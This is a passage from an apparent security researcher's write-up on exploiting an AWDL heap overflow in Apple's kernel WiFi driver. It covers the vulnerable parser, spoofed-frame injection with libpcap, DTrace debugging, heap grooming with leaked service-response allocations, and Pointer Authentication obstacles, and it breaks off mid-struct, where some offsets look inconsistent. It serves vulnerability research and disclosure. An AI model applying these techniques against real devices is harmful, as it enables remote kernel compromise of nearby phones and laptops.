This pattern of separating bounds checks away from parsing code is fragile; it's too easy to forget or not realize that when adding code for a new TLV type it's also a requirement to update the tlvCheckBounds function. If this pattern is used, try to come up with a way to enforce that new code must explicitly declare an upper bound here. One option could be to ensure an enum is used for the type and wrap the tlvCheckBounds method in a pragma to temporarily enable clang's -Wswitch-enum warning as an error:


#pragma clang diagnostic push

#pragma diagnostic error "-Wswitch-enum"

 

IO80211AWDLPeer::tlvCheckBounds(...) {

  switch(tlv->type) {

    case type_a:

      ...;

    case type_b:

      ...;

  }
}

 

#pragma clang diagnostic pop


This causes a compilation error if the switch statement doesn't have an explicit case statement for every value of the tlv->type enum.


Static analysis tools like Semmle can also help here. The EnumSwitch class can be used like in this example code to check whether all enum values are explicitly handled.


If the tlvCheckBounds checks pass then there is a switch statement with a case to parse each supported TLV:


Type

Handler

0x02

IO80211AWDLPeer::processServiceResponseTLV

0x04

IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction

0x05

IO80211AWDLPeer::parseAwdlElectionParamsV1

0x06

inline parsing of serviceParam

0x07

IO80211Peer::parseHTCapTLV

0x0c

nop

0x10

inline parsing of ARPA

0x11

IO80211Peer::parseVhtCapTLV

0x12

IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV

0x14

IO80211AWDLPeer::parseAwdlSyncTreeTLV

0x15

inline parser extracting 2 bytes

0x16

IO80211AWDLPeer::parseBloomFilterTlv

0x17

inlined parser of NSync

0x1d

IO80211AWDLPeer::parseBssSteeringTlv

SyncTree vulnerability in context

Here's a cleaned up decompilation of the relevant portions of the parseAwdlSyncTreeTLV method which contains the vulnerability:


int

IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlv* tlv)

{

  u64 new_sync_tree_size;

 

  u32 old_sync_tree_size = this->n_sync_tree_macs + 1;

  if (old_sync_tree_size >= 10 ) {

    old_sync_tree_size = 10;

  }

 

  if (old_sync_tree_size == tlv->len/6 ) {

    new_sync_tree_size = old_sync_tree_size;

  } else {

    new_sync_tree_size = tlv->len/6;

    this->n_sync_tree_macs = new_sync_tree_size;

  }

 

  memcpy(this->sync_tree_macs, &tlv->val[0], 6 * new_sync_tree_size);

 

...


sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That's enough space to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size which means it will be allocated in the kalloc.6144 zone.


tlvCheckBounds will enforce a maximum value of 1024 for the length of the SyncTree TLV. The TLV parser will round that value down to the nearest multiple of 6 and copy that number of bytes into the sync_tree_macs array at +0x1648. This will be our memory corruption primitive: a linear heap buffer overflow in 6-byte chunks which can corrupt all the fields in the IO80211AWDLPeer object past +0x16a8 and then a few hundred bytes off of the end of the kalloc.6144 zone chunk. We can easily cause IO80211AWDLPeer objects to be allocated next to each other by sending AWDL frames from a large number of different spoofed source MAC addresses in quick succession. This gives us four rough primitives to think about as we start to find a path to exploitation:


1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

Overflowing into the fields at the end of the peer object


2) Corrupting the lower fields of an IO80211AWDLPeer object groomed next to this one:


Overflowing into the fields at the start of a peer object next to this one


3) Corrupting the lower bytes of another object type we can groom to follow a peer in kalloc.6144:


Overflowing into a different type of object next to this peer in the same zone


4) Meta-grooming the zone allocator to place a peer object at a zone boundary so we can corrupt the early bytes of an object from another zone:



Overflowing into a different type of object in a different zone


We'll revisit these options in greater detail soon.

Getting on the air

At this point we understand enough about the AWDL frame format to start trying to get controlled, arbitrary data going over the air and reach the frame parsing entrypoint.


I tried for a long time to get the open source academic OWL project to build and run successfully, sadly without success. In order to start making progress I decided to write my own AWDL client from scratch. Another approach could have been to write a MacOS kernel module to interact with the existing AWDL driver, which may have simplified some aspects of the exploit but also made others much harder.


I started off using an old Netgear WG111v2 WiFi adapter I've had for many years which I knew could do monitor mode and frame injection, albeit only on 2.4 Ghz channels. It uses an rtl8187 chipset. Since I wanted to use the linux drivers for these adapters I bought a Raspberry Pi 4B to run the exploit.


In the past I've used Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, but since we're going to need a lot of control over injection timing it might not be the best tool. Scapy uses libpcap to interact with the hardware to inject raw frames so I took a look at libpcap. Some googling later I found this excellent tutorial example which demonstrates exactly how to use libpcap to inject a raw 802.11 frame. Let dissect exactly what's required:

Radiotap

We've seen the structure of the data in 802.11 AWDL frames; there will be an ieee80211 header at the start, an Apple OUI, then the AWDL action frame header and so on. If our WiFi adaptor were connected to a WiFi network, this might be enough information to transmit such a frame. The problem is that we're not connected to any network. This means we need to attach some metadata to our frame to tell the WiFi adaptor exactly how it should get this frame on to the air. For example, what channel and with what bandwidth and modulation scheme should it use to inject the frame? Should it attempt re-transmits until an ACK is received? What signal strength should it use to inject the frame?


Radiotap is a standard for expressing exactly this type of frame metadata, both when injecting frames and receiving them. It's a slightly fiddly variable-sized header which you can prepend on the front of a frame to be injected (or read off the start of a frame which you've sniffed.)


Whether the radiotap fields you specify are actually respected and used depends on the driver you are using - a driver may choose to simply not allow userspace to specify many aspects of injected frames. Here's an example radiotap header captured from a AWDL frame using the built-in MacOS packet sniffer on a MacBook Pro. Wireshark has parsed the binary radiotap format for us:



Wireshark parses radiotap headers in pcaps and shows them in a human-readable form


From this radiotap header we can see a timestamp, the data rate used for transmission, the channel (5.220 GHz which is channel 44) and the modulation scheme (OFDM). We can also see an indication of the strength of the received signal and a measure of the noise.


The tutorial gave the following radiotap header:


static uint8_t u8aRadiotapHeader[] = {

  0x00, 0x00, // version

  0x18, 0x00, // size

  0x0f, 0x80, 0x00, 0x00, // included fields

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //timestamp

  0x10, // add FCS

  0x00,// rate

  0x00, 0x00, 0x00, 0x00, // channel

  0x08, 0x00, // NOACK; don't retry

};


With knowledge of radiotap and a basic header it's not too tricky to get an AWDL frame on to the air using the pcap_inject interface and a wireless adaptor in monitor mode:


int pcap_inject(pcap_t *p, const void *buf, size_t size)


Of course, this doesn't immediately work and with some trial and error it seems that the rate and channel fields aren't being respected. Injection with this adaptor seems to only work at 1Mbps, and the channel specified in the radiotap header won't be the one used for injection. This isn't such a problem as we can still easily set the wifi adaptor channel manually:


iw dev wlan0 set channel 6


Injection at 1Mbps is exceptionally slow but this is enough to get a test AWDL frame on to the air and we can see it in Wireshark on another device in monitor mode. But nothing seems to be happening on a target device. Time for some debugging!

Debugging with DTrace

The SEEMOO labs paper had already suggested setting some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages were incredibly helpful but often you want more information than you can get from the logs.


For the initial report PoC I showed how to use the MacOS kernel debugger to modify an AWDL frame which was about to be transmitted. Typically, in my experience, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst you can technically script it using lldb's python bindings, I wouldn't recommend it.


Apple does have one trick up their sleeve however; DTrace! Where the MacOS kernel debugger is awful in my opinion, dtrace is exceptional. DTrace is a dynamic tracing framework originally developed by Sun Microsystems for Solaris. It's been ported to many platforms including MacOS and ships by default. It's the magic behind tools such as Instruments. DTrace allows you to hook in little snippets of tracing code almost wherever you want, both in userspace programs, and, amazingly, the kernel. Dtrace has its quirks. Hooks are written in the D language which doesn't have loops and the scoping of variables takes a little while to get your head around, but it's the ultimate debugging and reversing tool.


For example, I used this dtrace script on MacOS to log whenever a new IO80211AWDLPeer object was allocated, printing it's heap address and MAC address:


self char* mac;

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {

  self->mac = (char*)arg0;

}

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return

  printf("new AWDL peer: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p", self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1); 

}


Here we're creating two hooks, one which runs at a function entry point and the other which runs just before that same function returns. We can use the self-> syntax to pass variables between the entry point and return point and DTrace makes sure that the entries and returns match up properly.


We have to use the mangled C++ symbol in dtrace scripts; using c++filt we can see the demangled version:


$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager

IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)


The entry hook "saves" the pointer to the MAC address which is passed as the first argument; associating it with the current thread and stack frame. The return hook then prints out that MAC address along with the return value of the function (arg1 in a return hook is the function's return value) which in this case is the address of the newly-allocated IO80211AWDLPeer object.


With DTrace you can easily prototype custom heap logging tools. For example if you're targeting a particular allocation size and wish to know what other objects are ending up in there you could use something like the following DTrace script:


/* some globals with values */

BEGIN {

  target_size_min = 97;

  target_size_max = 128;

}

 

fbt:mach_kernel:kalloc_canblock:entry {

  self->size = *(uint64_t*)arg0;

}

 

fbt:mach_kernel:kalloc_canblock:return

/self->size >= target_size_min ||

 self->size <= target_size_max   /

{

  printf("target allocation %x =  %x", self->size, arg1);

  stack();

}


The expression between the two /'s allows the hook to be conditionally executed. In this case limiting it to cases where kalloc_canblock has been called with a size between target_size_min and target_size_max. The built-in stack() function will print a stack trace, giving you some insight into the allocations within a particular size range. You could also use ustack() to continue that stack trace in userspace if this kernel allocation happened due to a syscall for example.


DTrace can also safely dereference invalid addresses without kernel panicking, making it very useful for prototyping and debugging heap grooms. With some ingenuity it's also possible to do things like dump linked-lists and monitor for the destruction of particular objects.


I'd really recommend spending some time learning DTrace; once you get your head around its esoteric programming model you'll find it an immensely powerful tool.

Reaching the entrypoint

Using DTrace to log stack frames I was able to trace the path legitimate AWDL frames took through the code and determine how far my fake AWDL frames made it. Through this process I discovered that there are, at least on MacOS, two AWDL parsers in the kernel: the main one we've already seen inside the IO80211Family kext and a second, much simpler one in the driver for the particular chipset being used. There were three checks in this simpler parser which I was failing, each of which meant my fake AWDL frames never made it to the IO80211Family code:


Firstly, the source MAC address was being validated. MAC addresses actually contain multiple fields: 

The first half of a MAC address is an OUI. The least significant bit of the first byte defines whether the address is multicast or unicast. The second bit defines whether the address is locally administered or globally unique. 


Diagram used under CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju - SVG drawing based on PNG uploaded by User:Vtraveller. This can be found on Wikipedia here


The source MAC address 01:23:45:67:89:ab from the libpcap example was an unfortunate choice as it has the multicast bit set. AWDL only wants to deal with unicast addresses and rejects frames from multicast addresses. Choosing a new MAC address to spoof without that bit set solved this problem.


The next check was that the first two TLVs in the variable-length payload section of the frame must be a type 4 (sync parameters) then a type 6 (service parameters.)


Finally the channel number in the sync parameters had to match the channel on which the frame had actually been received.


With those three issues fixed I was finally able to get arbitrary controlled bytes to appear at the actionFrameReport method on a remote device and the next stage of the project could begin.

A framework for an AWDL client

We've seen that AWDL uses time division multiplexing to quickly switch between the channels used for AWDL (typically 6 and 44) and the channel used by the access point the device is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames sent by AWDL peers you can calculate when they will be listening in the future. The OWL project uses the linux libev library to try to only transmit at the right moment when other peers will be listening.


There are a few problems with this approach for our purposes:


Firstly, and very importantly, this makes targeting difficult. AWDL action frames are (usually) sent to a broadcast destination MAC address (ff:ff:ff:ff:ff:ff.) It's a mesh network and these frames are meant to be used by all the peers for building up the mesh.


Whilst exploiting every listening AWDL device in proximity at the same time would be an interesting research problem and make for a cool demo video, it also presents many challenges far outside the initial scope. I really needed a way to ensure that only devices I controlled would process the AWDL frames I sent.


With some experimentation it turned out that all AWDL frames can also be sent to unicast addresses and devices would still parse them. This presents another challenge as the AWDL virtual interface's MAC address is randomly generated each time the interface is activated. For testing on MacOS it suffices to run:


ifconfig awdl0


to determine the current MAC address. For iOS it's a little more involved; my chosen technique has been to sniff on the AWDL social channels and correlate signal strength with movements of the device to determine its current AWDL MAC.


There's one other important difference when you send an AWDL action frame to a unicast address: if the device is currently listening on that channel and receives the frame, it will send an ACK. This turns out to be extremely helpful. We will end up building some quite complex primitives using AWDL action frames, abusing the protocol to build a weird machine. Being able to tell whether a target device really received a frame or not means we can treat AWDL frames more like a reliable transport medium. For the typical usage of AWDL this isn't necessary; but our usage of AWDL is not going to be typical.


This ACK-sniffing model will be the building block for our AWDL frame injection API.

Acktually receiving ACKs

Just because the ACKs are coming over the air now doesn't mean we actually see them. Although the WiFi adaptor we're using for injection must be technically capable of receiving ACKs (as they are a fundamental protocol building block), being able to see them on the monitor interface isn't guaranteed.


A screenshot of wireshark showing a spoofed AWDL frame followed by an Acknowledgement from the target device.


The libpcap interface is quite generic and doesn't have any way to indicate that a frame was ACKed or not. It might not even be the case that the kernel driver is aware whether an ACK was received. I didn't really want to delve into the injection interface kernel drivers or firmware as that was liable to be a major investment in itself so I tried some other ideas.


ACK frames in 802.11g and 802.11a are timing based. There's a short window after each transmitted frame when the receiver can ACK if they received the frame. It's for this reason that ACK frames don't contain a source MAC address. It's not necessary as the ACK is already perfectly correlated with a source device due to the timing.


If we also listen on our injection interface in monitor mode we might be able to receive the ACK frames ourself and correlate them. As mentioned, not all chipsets and drivers actually give you all the management frames.

 

For my early prototypes, I managed to find a pair in my box of WiFi adaptors where one would successfully inject on 2.4ghz channels at 1Mbps and the other would successfully sniff ACKs on that channel at 1Mbps.


1Mbps is exceptionally slow; a relatively large AWDL frame ends up being on the air for 10ms or more at that speed, so if your availability window is only a few ms you're not going to get many frames per second. Still, this was enough to get going.


The injection framework I built for the exploit uses two threads, one for frame injection and one for ACK sniffing. Frames are injected using the try_inject function, which extracts the spoofed source MAC address and signals to the second sniffing thread to start looking for an ACK frame being sent to that MAC.


Using a pthread condition variable, the injecting thread can then wait for a limited amount of time during which the sniffing thread may or may not see the ACK. If the sniffing thread does see the ACK it can record this fact then signal the condition variable. The injection thread will stop waiting and can check whether the ACK was received.


Take a look at try_inject_internal in the exploit for the mutex and condition variable setup code for this.


There's a wrapper around try_inject called inject which repeatedly calls try_inject until it succeeds. These two methods allow us to do all the timing sensitive and insensitive frame injection we need.


These two methods take a variable number of pkt_buf_t pointers; a simple custom variable-sized buffer wrapper object. The advantage of this approach is that it allows us to quickly prototype new AWDL frame structures without having to write boilerplate code. For example, this is all the code required to inject a basic AWDL frame and re-transmit it until the target receives it:


inject(RT(),

       WIFI(dst, src),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       PKT_END());


Investing a little bit of time building this API saved a lot of time in the long run and made it very easy to experiment with new ideas.


With an injection framework finally up and running we can start to think about how to actually exploit this vulnerability!

The new challenges on A12/A13

The Apple A12 SOC found in the iPhone Xr/Xs contained the first commercially-available ARM CPU implementing the ARM-8.3 optional Pointer Authentication feature. This was released in September 2018. This post from Project Zero researcher Brandon Azad covers PAC and its implementation by Apple in great detail, as does this presentation from the 2019 LLVM developers meeting.


Its primary use is as a form of Control Flow Integrity. In theory all function pointers present in memory should contain a Pointer Authentication Code in their upper bits which will be verified after the pointer is loaded from memory but before it's used to modify control flow.


In almost all cases this PAC instrumentation will be added by the compiler. There's a really great document from the clang team which goes into great detail about the implementation of PAC from a compiler point of view and the security tradeoffs involved. It has a brilliant section on the threat model of PAC which frankly and honestly discusses the cases where PAC may help and the cases where it won't. Documentation like this should ship with every mitigation.


Having a publicly documented threat model helps everyone understand the intentions behind design decisions and the tradeoffs which were necessary. It helps build a common vocabulary and helps to move discussions about mitigations away from a focus on security through obscurity towards a qualitative appraisal of their strengths and weaknesses.


Concretely, the first hurdle PAC will throw up is that it will make it harder to forge vtable pointers.


All OSObject-derived objects have virtual methods. IO80211AWDLPeer, like almost all IOKit C++ classes derives from OSObject so the first field is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can easily gain control of a vtable pointer. This technique was used in Mateusz Jurczyk's Samsung MMS remote exploit and Natalie Silvanovich's remote WebRTC exploit this year.


Kernel virtual calls have gone from looking like this on A11 and below:


LDR   X8, [X20]      ; load vtable pointer

LDR   X8, [X8,#0x38] ; load function pointer from vtable

MOV   X0, X20

BLR   X8             ; call virtual function


to this on A12 and above:


LDR   X8, [X20]           ; load vtable pointer

 

; authenticate vtable pointer using A-family data key and zero context

; if authentication passes, add 0x38 to vtable pointer, load value

; at that address into X9 and store X8+0x38 back to X8 without a PAC

LDRAA X9, [X8,#0x38]!

 

; overwrite the upper 16 bits of X8 with the constant 0xFFFC

; this is a hash of the mangled symbol; constant at each callsite

MOVK  X8, #0xFFFC,LSL#48

MOV   X0, X20

 

; authenticate virtual function pointer with A-family instruction key

; and context value where the upper 16 bits are a hash of the

; virtual function prototype and the lower 48 bits are the runtime

; address of the virtual function pointer in the vtable

BLRAA X9, X8


Diagrammatic view of a C++ virtual call in ARM64e showing the keys and discriminators used


What does that mean in practice?


If we don't have a signing gadget, then we can't trivially point a vtable pointer to an arbitrary address. Even if we could, we'd need a data and instruction family signing gadget with control over the discriminator.


We can swap a vtable pointer with any other A-family 0-context data key signed pointer, however the virtual function pointer itself is signed with a context value consisting of the address of the vtable entry and a hash of the virtual function prototype. This means we can't swap virtual function pointers from one vtable into another one (or more likely into a fake vtable to which we're able to get an A-family data key signed pointer.)


We can swap one vtable pointer for another one to cause a type confusion, however every virtual function call made through that vtable pointer would have to be calling a function with a matching prototype hash. This isn't so improbable; a fundamental building block of object-oriented programming in C++ is to call functions with matching prototypes but different behaviour via a vtable. Nevertheless you'd have to do some thinking to come up with a generic defeat using this approach.


An important observation is that the vtable pointers themselves have no address diversity; they're signed with a zero-context. This means that if we can disclose a signed vtable pointer for an object of type A at address X, we can overwrite the vtable pointer for another object of type A at a different address Y.


This might seem completely trivial and uninteresting but remember: we only have a linear heap buffer overflow. If the vtable pointer had address diversity then for us to be able to safely corrupt fields after the vtable in an adjacent object we'd have to first disclose the exact vtable pointer following the object which we can overflow out of. Instead we can disclose any vtable pointer for this type and it will be valid.


The clang design doc explains why this is:


It is also known that some code in practice copies objects containing v-tables with memcpy, and while this is not permitted formally, it is something that may be invasive to eliminate.


Right at the end of this document they also say "attackers can be devious." On A12 and above we can no longer trivially point the vtable pointer to a fake vtable and gain arbitrary PC control fairly easily. Guess we'll have to get devious :)

Some initial ideas

Initially I continued using the iOS 12 beta 1 kernelcache when searching for exploitation primitives and performing the initial reversing to better understand the layout of the IO80211AWDLPeer object. This turned out to be a major mistake and a few weeks were spent following unproductive leads:


In the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer seemed uninteresting, at least from the perspective of being able to build a stronger primitive from the linear overflow. For this reason my initial ideas looked at corrupting the fields at the beginning of an IO80211AWDLPeer object which I could place subsequently in memory, option 2 which we saw earlier:


Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects fairly easy. The synctree buffer overflow then allows corrupting the lower fields of an IO80211AWDLPeer in addition to the upper fields


Almost certainly we're going to need some kind of memory disclosure primitive to land this exploit. My first ideas for building a memory disclosure primitive involved corrupting the linked-list of peers. The data structure holding the peers is in fact much more complex than a linked list, it's more like a priority queue with some interesting behaviours when the queue is modified and a distinct lack of safe unlinking and the like. I'd expect iOS to start slowly migrating to using data-PAC for linked-list integrity, but for now this isn't the case. In fact these linked lists don't even have the most basic safe-unlinking integrity checks yet.


The start of an IO80211AWDLPeer object looks like this:



All IOKit objects inheriting from OSObject have a vtable and a reference count as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the peer's MAC address and the peer's peer_manager pointer.


My first ideas revolved around trying to partially corrupt a peer linked-list pointer. In hindsight, there's an obvious reason why this doesn't work (which I'll discuss in a bit), but let's remain enthusiastic and continue on for now...


Looking through the places where the linked list of peers seemed to be used it looked like perhaps the IO80211AWDLPeerManager::updatePeerListBloomFilter method might be interesting from the perspective of trying to get data leaked back to us. Let's take a look at it:


IO80211AWDLPeerManager::updatePeerListBloomFilter(){

  int n_peers = this->peers_list.n_elems;

 

  if (!this->peer_bloom_filters_enabled) {

    return 0;

  }

 

  bzero(this->bloom_filter_buf, 0xA00uLL);

  this->n_macs_in_bloom_filter = 0;

 

  IO80211AWDLPeer* peer = this->peers_list.head;

 

  int n_peers_in_filter = 0;

  for (;

       n_peers_in_filter < n_peers && n_peers_in_filter < 0x100;

       n_peers_in_filter++) {

    this->bloom_filter_macs[n_peers_in_filter] = peer.mac;

    peer = peer->flink;

  }

 

  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,

                      0,

                      n_peers_in_filter,

                      this->bloom_filter_macs,

                      this->bloom_filter_buf);

 

  if (n_peers_in_filter){

    this->updateBroadcastMI(9, 1, 0);
  }

 

  return 0;

}


From the IO80211AWDLPeerManager it's reading the peer list head pointer as well as a count of the number of entries in the peer list. For each entry in the list it's reading the MAC address field into an array then builds a bloom filter from that buffer. 


The interesting part here is that the list traversal is terminated using a count of elements which have been traversed rather than by looking for a termination pointer value at the end of the list (eg a NULL or a pointer back to the head element.) This means that potentially if we could corrupt the linked-list pointer of the second-to-last peer to be processed we could point it to a fake peer and get data at a controlled address added into the bloom filter. updateBroadcastMI looks like it will add that bloom filter data to the Master Indication frame in the bloom filter TLV, meaning we could get a bloom filter containing data read from a controlled address sent back to us. Depending on the exact format of the bloom filter it would probably be possible to then recover at least some bits of remote memory.


It's important to emphasize at this point that due to the lack of a remote KASLR leak and also the lack of a remote PAC signing gadget or vtable disclosure, in order to corrupt the linked-list pointer of an adjacent peer object we have no option but to corrupt its vtable pointer with an invalid value. This means that if any virtual methods were called on this object, it would almost certainly cause a kernel panic.


The first part of trying to get this to work was to work out how to build a suitable heap groom such that we could overflow from a peer into the second-to-last peer in the list which would be processed


Both the linked-list order and the virtual memory order need to be groomed to allow a targeted partial overflow of the final linked-list pointer to be traversed. In this layout we'd need to overflow from 2 into 6 to corrupt the final pointer from 6 to 7.


There is a mitigation from a few years ago in play here which we'll have to work around; namely the randomization of the initial zone freelists which adds a slight element of randomness to the order of the allocations you will get for consecutive calls to kalloc for the same size. The randomness is quite minimal however so the trick here is to be able to pad your allocations with "safe" objects such that even though you can't guarantee that you always overflow into the target object, you can mostly guarantee that you'll overflow into that object or a safe object.


We need two primitives: Firstly, we need to understand the semantics of the list. Secondly, we need some safe objects.

The peer list

With a bit of reversing we can determine that the code which adds peers to the list doesn't simply add them to the start. Peers which are first seen on a 2.4GHz channel (6) do get added this way, but peers first seen on a 5GHz channel (44) are inserted based on their RSSI (received signal strength indication - a unitless value approximating signal strength.) Stronger signals mean the peer is probably physically closer to the device and will also be closer to the start of the list. This gives some nice primitives for manipulating the list and ensuring we know where peers will end up.

Safe objects

The second requirement is to be able to allocate arbitrary, safe objects. Our ideal heap grooming/shaping objects would have the following primitives:


1) arbitrary size

2) unlimited allocation quantity

3) allocation has no side effects

4) controlled contents

5) contents can be safely corrupted

6) can be free'd at an arbitrary, controlled point, with no side effects


Of course, we're completely limited to objects we can force to be allocated remotely via AWDL so all the tricks from local kernel exploitation don't work. For example, I and others have used various forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to build these primitives. None of these are going to work at all. AWDL is sufficiently complicated however that after some reversing I found a pretty good candidate object.

Service response descriptor (SRD)

This is my reverse-engineered definition of the services response descriptor TLV (type 2):


{ u8  type

  u16 len

  u16 key_len

  u8  key_val[key_len]

  u16 value_total_size

  u16 fragment_offset

  u8  fragment[len-key_len-6] }


It has two variable-sized fields: key_val and fragment. The key_length field defines the length of the key_val buffer, and the length of fragment is the remaining space left at the end of the TLV. The parser for this TLV makes a kalloc allocation of val_length, an arbitrary u16. It then memcpy's from fragment into that kalloc buffer at offset frag_offset:


The service_response technique gives us a powerful heap grooming primitive


I believe this is supposed to be support for receiving out-of-order fragments of service request responses. It gives us a very powerful primitive for heap grooming. We can choose an arbitrary allocation size up to 64k and write an arbitrary amount of controlled data to an arbitrary offset in that allocation and we only need to provide the offset and content bytes.


This also gives us a kind of amplification primitive. We can bundle quite a lot of these TLVs in one frame allowing us to make megabytes of controlled heap allocations with minimal side effects in just one AWDL frame.


This SRD technique in fact almost completely meets criteria 1-5 outlined above. It's almost perfect apart from one crucial point; how can we free these allocations?


Through static reversing I couldn't find how these allocations would be free'd, so I wrote a dtrace script to help me find when those exact kalloc allocations were free'd. Running this dtrace script then running a test AWDL client sending SRDs I saw the allocation but never the free. Even disabling the AWDL interface, which should clean up most of the outstanding AWDL state, doesn't cause the allocation to be freed.


This is possibly a bug in my dtrace script, but there's another theory: I wrote another test client which allocated a huge number of SRDs. This allocated a substantial amount of memory, enough to be visible using zprint. And indeed, running that test client repeatedly then running zprint you can observe the inuse count of the target zone getting larger and larger. Disabling AWDL doesn't help, neither does waiting overnight. This looks like a pretty trivial memory leak.


Later on we'll examine the cause of this memory leak but for now we have a heap allocation primitive which meets criteria 1-5, that's probably good enough!

A first attempt at a useful corruption

I managed to build a heap groom which gets the linked-list and heap objects set up such that I can overflow into the second-to-last peer object to be processed:


By surrounding peer objects with a sufficient number of safe objects we can ensure that the linear corruption either hits the right peer object or a safe object


The trick is to ensure that the ratio of safe objects to peers is sufficiently high that you can be (reasonably) sure that the two target peers will only be next to each other or next to safe objects (they won't be next to other peers in the list.) Even though you may not be able to force the two peers to be in the correct order as shown in the diagram, you can at least make the corruption safe if they aren't, then try again.


When writing the code to build the SyncTree TLV I realized I'd made a huge oversight...


My initial idea had been to only partially overwrite a valid linked-list pointer element:


If we could partially overflow the peer_list_flink pointer we could potentially move it to point it somewhere nearby. In this illustration by moving it down by 8 bytes we could potentially get some bytes of a peer_list_blink added to the peer MACs bloom filter. A partial overwrite doesn't directly give a relative add or subtract primitive, but with some heap grooming overwriting the lower 2 bytes can yield something similar


But when you actually look more closely at the memory layout taking into account the limitations of the corruption primitive:


Computing the relative offsets between two IO80211AWDLPeers next to each other in memory it turns out that a useful partial overwrite of peer_list_flink isn't possible as it lies on a 6-byte boundary from the lower peer's sync_tree_macs array


This is not a useful type of partial overwrite and it took a lot of effort to make this heap groom work only to realize in hindsight this obvious oversight.


Attempting to salvage something from all this work I tried instead to just completely overwrite the linked-list pointer. We'd still need some other vulnerability or technique to determine what we should overwrite with but it would at least be some progress to see a read or write from a controlled address.


Alas, whilst I'm able to do the overflow, it appears that the linked-list of peers is being continually traversed in the background even when there's no AWDL traffic and virtual methods are being called on each peer. This will make things significantly harder without first knowing a vtable pointer.


Another option would be to trigger the SyncTree overflow twice during the parsing of a single frame. Recall the code in actionFrameReport


IO80211AWDLPeer::actionFrameReport

...

      case 0x14:

        if (tlv_cnt[0x14] >= 2)

          goto ERR;

        tlv_cnt[0x14]++;

        this->parseAwdlSyncTreeTLV(bytes);


I explored places where a TLV would trigger a peer list traversal. The idea would then be to sandwich a controlled lookup between two SyncTree TLVs, the first to corrupt the list and the second to somehow make that safe. There were some code paths like this, where we could cause a controlled peer to be looked up in the peer list. There were even some places where we could potentially get a different memory corruption primitive from this but they looked even trickier to exploit. And even then you'd not be able to reset the peer list pointer with the second overflow anyway.

Reset

Thus far none of my ideas for a read panned out; messing with the linked list without a correctly PAC'd vtable pointer just doesn't seem feasible. At this point I'd probably consider looking for a second vulnerability. For example, in Natalie's recent WebRTC exploit she was able to find a second vulnerability to defeat ASLR.


There are still some other ideas left open but they seem tricky to get right:


The other major type of object in the kalloc.6144 zone are ipc_kmsg's for some IOKit methods. These are in-flight mach messages and it might be possible to corrupt them such that we could inject arbitrary mach messages into userspace. This idea seems mostly to create new challenges rather than solve any open ones though.


If we don't target the same zone then we could try a cross-zone attack, but even then we're quite limited by the primitives offered by AWDL. There just aren't that many interesting objects we can allocate and manipulate.


By this point I've invested a lot of time into this project and am not willing to give up. I've also been hearing very faint whispers that I might have accidentally stumbled upon an attack surface which is being actively exploited. Time to try one more thing...

Getting up to date

Up until this point I'd been doing most of my reversing using the partially symbolized iOS 12 beta 1 kernelcache. I had done a considerable amount of reversing engineering to build up a reasonable idea of all the fields in the IO80211AWDLPeer object which I could corrupt and it wasn't looking promising. But this vulnerability was only going to get patched in iOS 13.3.1.


Can they have added new fields in iOS 13? It seemed unlikely but of course worth a look.


Here's my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:


struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {

/* +0x0000 */  void *vtable;

/* +0x0008 */  uint32_t ref_cnt;

/* +0x000C */  uint32_t bucket;

/* +0x0010 */  void *peer_list_flink;

/* +0x0018 */  void *peer_list_blink;

/* +0x0020 */  struct ether_addr peer_mac;

/* +0x0026 */  uint8_t pad1[2];

/* +0x0028 */  struct IO80211AWDLPeerManager *peer_manager;

/* +0x0030 */  uint8_t pad8[384];

/* +0x01B0 */  uint16_t HT_FLAGS;

/* +0x01B2 */  uint8_t HT_features[26];

/* +0x01CC */  uint8_t HT_caps;

/* +0x01CD */  uint8_t pad10[14];

/* +0x01DB */  uint8_t VHT_caps;

/* +0x01DC */  uint8_t pad9[732];

/* +0x0418 */  uint8_t added_to_fw_cache;

/* +0x04B9 */  uint8_t is_on_correct_infra_channel;

/* +0x04BA */  uint8_t pad0[6];

/* +0x04C0 */  uint32_t nsync_total_len;

/* +0x0404 */  uint8_t nsync_tlv_buf[64];

/* +0x0504 */  uint32_t flags_from_dp_tlv;

/* +0x0508 */  uint8_t pad14[19];

/* +0x051B */  uint32_t n_sync_tree_macs;

/* +0x0517 */  uint8_t pad20[126];

/* +0x059D */  uint8_t peer_infra_channel;

/* +0x059E */  struct ether_addr peer_infra_mac;

/* +0x05A4 */  struct ether_addr some_other_mac;

/* +0x05AA */  uint8_t country_code[3];

/* +0x05AD */  uint8_t pad5[41];

/* +0x05D6 */  uint16_t social_channels;

/* +0x0508 */  uint64_t last_AF_timestamp;

/* +0x05E0 */  uint8_t pad17[116];

/* +0x0654 */  uint8_t chanseq_encoding;

